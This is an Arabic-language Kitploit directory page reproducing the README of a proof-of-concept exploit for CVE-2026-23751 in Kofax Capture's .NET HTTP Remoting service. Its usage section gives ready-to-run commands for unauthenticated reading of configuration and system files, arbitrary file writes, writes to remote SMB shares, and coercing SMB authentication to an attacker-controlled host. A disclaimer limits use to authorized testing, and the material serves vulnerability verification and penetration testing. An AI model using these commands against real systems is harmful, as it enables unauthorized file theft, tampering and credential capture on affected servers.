Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23751-poc — عميل RemotingClient مُرقَّع لاستغلال CVE-2026-23751 (أتمتة التنغستن - Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإكراه SMB عبر .NET HTTP Remoting) | Kitploit
أدوات/GitHubGitHub/siebrum/cve-2026-23751-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

عميل RemotingClient مُرقَّع لاستغلال CVE-2026-23751 (أتمتة التنغستن - Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإكراه SMB عبر .NET HTTP Remoting)

عرض المستودع
منذ 6س 39دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23751-poc

إعادة تنفيذ لإثبات المفهوم للتقنية الموصوفة في Code White's NewRemotingTricks، تستهدف Tungsten Automation Kofax Capture.

CVE-2026-23751

العنوان: Tungsten Automation - Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإجبار SMB عبر .NET HTTP Remoting

CVE: CVE-2026-23751

الوصف

يؤثر CVE-2026-23751 على Tungsten Automation Kofax Capture ويسمح لمهاجم عن بُعد غير مصادق بالتفاعل مع نقطة نهاية .NET HTTP Remoting المكشوفة بواسطة خدمة ACService الخاصة بـ Kofax Capture.

يمكن استغلال الثغرة لتنفيذ ما يلي:

  • قراءة ملفات عشوائية بدون مصادقة
  • كتابة ملفات عشوائية بدون مصادقة
  • إجبار مصادقة SMB
  • الوصول إلى الملفات المحلية المتاحة لخدمة Kofax Capture
  • الوصول إلى الملفات البعيدة عبر مسارات UNC

يعيد إثبات المفهوم تنفيذ تقنية .NET Remoting ذات الصلة من مشروع Code White's NewRemotingTricks.

نقطة النهاية المتأثرة

يستهدف إثبات المفهوم نقطة نهاية HTTP Remoting الخاصة بخدمة ACService في Kofax Capture:

root@kitploit:~
http://<target>:2424/ACService

المنفذ 2424 هو منفذ HTTP Remoting الافتراضي المستخدم بواسطة الخدمة المتأثرة.

الاستخدام

قراءة ملف محلي

المثال التالي يقرأ ملف hosts الخاص بنظام Windows من الهدف:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

يمكن قراءة ملف إعدادات Kofax Capture بالمثل:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

كتابة ملف محلي

يمكن كتابة ملف إلى موقع يمكن لخدمة Kofax Capture الوصول إليه عن طريق توفير المسار الهدف متبوعًا بالمحتوى:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

الكتابة إلى مشاركة SMB عن بُعد

يمكن استخدام نفس الوظيفة مع مسار UNC للكتابة إلى مشاركة SMB عن بُعد:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

تعتمد القدرة على الوصول إلى المورد البعيد على صلاحيات وسياق الأمان الخاص بخدمة Kofax Capture.

إجبار SMB

يمكن توفير URI بصيغة file:// لدفع الهدف للوصول إلى مورد SMB عن بُعد:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

يمكن أن يؤدي هذا إلى مصادقة المضيف المتأثر على خادم SMB الذي يتحكم فيه المهاجم، اعتمادًا على البيئة المستهدفة وإعدادات الأمان الخاصة بها.

الخلفية التقنية

تتضمن الثغرة استخدام .NET HTTP Remoting بواسطة خدمة ACService الخاصة بـ Kofax Capture.

يدعم .NET Remoting مخططات URI متنوعة وآليات تسلسل الكائنات. من خلال التفاعل مع نقطة نهاية remoting المكشوفة بطريقة محددة، يمكن لعميل غير مصادق أن يتسبب في قيام الخدمة بتنفيذ عمليات على نظام الملفات باستخدام مسارات يقدمها العميل.

يوضح إثبات المفهوم كيف يمكن استخدام هذا السلوك من أجل:

  • استرجاع الملفات المحلية
  • كتابة البيانات إلى الملفات المحلية
  • الوصول إلى مسارات UNC/SMB البعيدة
  • تحفيز الوصول إلى موارد file:// البعيدة

يوضح إثبات المفهوم حاليًا كتابة بيانات نصية إلى الملفات. يمكن دعم أنواع ملفات وتنسيقات حمولات أخرى عن طريق تعديل الكود المصدري وفقًا لذلك.

يعتمد هذا التنفيذ على الأبحاث والتقنيات المقدمة في:

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

المتطلبات

  • Windows
  • وصول شبكي إلى خدمة ACService الخاصة بـ Kofax Capture على الهدف
  • نسخة Kofax Capture تكشف نقطة نهاية HTTP Remoting المتأثرة
  • RemotingClient_MBRO_Lazy.exe

لا تتطلب عملية الاستغلال أي مصادقة على خدمة Kofax Capture.

إخلاء المسؤولية

تم توفير هذا المستودع لأغراض البحث الأمني، والتحقق من الثغرات، واختبار الاختراق المصرح به فقط.

لا تستخدم إثبات المفهوم هذا ضد الأنظمة دون إذن صريح. المؤلف غير مسؤول عن الأضرار، أو فقدان البيانات، أو الوصول غير المصرح به، أو أي عواقب أخرى ناتجة عن سوء استخدام هذا البرنامج.

المراجع

  • CVE-2026-23751 — Tungsten Automation Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإجبار SMB عبر .NET HTTP Remoting
  • Code White - NewRemotingTricks
تنزيل الأداة